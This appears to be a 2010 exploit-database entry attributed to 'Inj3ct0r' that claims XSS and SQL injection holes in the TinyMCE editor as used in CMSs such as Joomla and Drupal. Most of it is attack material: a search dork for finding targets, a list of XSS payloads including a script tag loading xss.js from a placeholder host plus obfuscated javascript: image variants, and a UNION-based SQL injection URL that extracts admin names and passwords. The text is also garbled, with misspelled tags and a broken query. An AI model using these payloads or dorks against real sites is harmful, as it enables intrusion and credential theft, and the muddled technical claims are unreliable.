TinyMCE - Javascript WYSIWYG Editor xss/sql injection vurnerebility

2010-02-0800:00:00

vulners.com

JSON

===================================================================
TinyMCE - Javascript WYSIWYG Editor xss/sql injection vurnerebility

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'`\ /\ \ /'`\ 0
0 /\, \ ___ /\\/\\ \ \ \ \ ,\/\ \/\ \ _ ___ 1
1 \//\ \ /' _ `\ \/\ \//\< /'\ \ \/\ \ \ \ \/\`'\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \/\ \ \\ \ \\ \ \ \/ 1
1 \ \\ \\ \\\ \ \ \/\ \\\ \\\ \/\ \\ 0
0 \//\//\//\ \\ \// \// \// \// \// 1
1 \ \/ >> Exploit database separated by exploit 0
0 \// type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com

[+] Vurnerebility: Js tiny_mce/tiny_mce WYSIWYG{java script} vurnerebility xss–>popup
& SQl implemented
[+] Language : Java–,Xml
[+] lisences : LGPL
[+] Vendor : Moxiecode Systems AB
[+] support : IE7J0/IE6.0/NS8.1-IE/NS8.1-G/FF2.0/O9.02;
[+] vendor : http://tinymce.moxiecode.com/
[+] implemented : joomla componen,drupal…
[+] dork : powered:powered by CMS
: inurl"file_manager.php?type=img"

–[Vulnerability sampling]–

alert(String.fromCharCode(X1,X2,X3,X4))//";alert(String.fromCharCode(X1,X2,X3,x4))//\";

    alert&#40;String.fromCharCode&#40;X1,X2,X3,x4&#41;&#41;//--&gt;&lt;/SCRIPT&gt;&quot;&gt;&#39;&gt;&lt;SCRIPT&gt;alert&#40;String.fromCharCode&#40;X1,X2,X3,x4&#41;&#41;&lt;/SCRIPT&gt;

'';!–"<XSS>=&{()}'

    &lt;script SRC=http//:server.com/xss.js&gt;&lt;/put_SCRIPT&gt;
    &lt;a hreef=&quot;http://www.server://www.server.com/server.com/&quot;&gt;put_code&lt;/a&gt;
    &lt;a href=&quot;http://www.server.com./&quot;&gt;put_code&lt;/a&gt;
    &lt;marquee&gt;http://server.net&quot;&gt;put_code&lt;/marquee&gt;
    &lt;a href=&quot;//srver.net&quot;&gt;put_code&lt;/A&gt;
    &lt;a href=&quot;http://0x1x.01x0061.0x6/&quot;&gt;put_code&lt;/a&gt;

    [Thread img src]

    &quot;&lt;img src=javascript:alert&#40;&amp;quot;XSS&amp;quot;&#41;&gt;&quot;
    &quot;&lt;img src=&quot;javascript:alert&#40;&#39;Put_script&#39;&#41;;&quot;&gt; [or] &lt;IMG SRC=javascript:alert&#40;&#39;put_Script&#39;&#41;&gt;&quot;
    &quot;&lt;IMG SRC=javascript:alert&#40;String.fromCharCode&#40;X1,X2,X3,X4&#41;&#41;&gt;&quot;
    &quot;&lt;img src=&#96;javascript:alert&#40;&quot;put_xss&quot;&#41;&#96;&gt;&quot;
    &quot;&lt;IMG SRC=&quot;jav  ascript:alert&#40;&#39;XSS&#39;&#41;;&quot;&gt;&quot;

    &lt;IMG
    SRC
    =
    &quot;
    write javascript vertikal position exmpl:       
    j
    s
    :
    a
    l
    e
    r
    t
    &#40;
    &#39;
    put code vertical position
    &#39;
    &#41;
    &#41;
    ;
    &gt;

    &quot;&lt;IMG SRC=&#1;&#2;&#3;&#4;&#5;&#6;&#7;&gt;&quot;

try conversion---->use RainbowText from <IMG SRC=��&#3>
make compilign:
<IMG SRC=&#1;&#2;&#3;&#3>

SQL implemented:Injection vulnerability---->installed on c-panel(joomla—sampling write tabel view/editor)

Exploit :server/patch/index.php?menuID=-value union
select////users/2,3,4,5/password////from/2,3,4,5//,Group_CONCAT(name,CHAR(3,4,5),wachtwoord),2,3 from admin–

~ - [ [ : Inj3ct0r : ] ]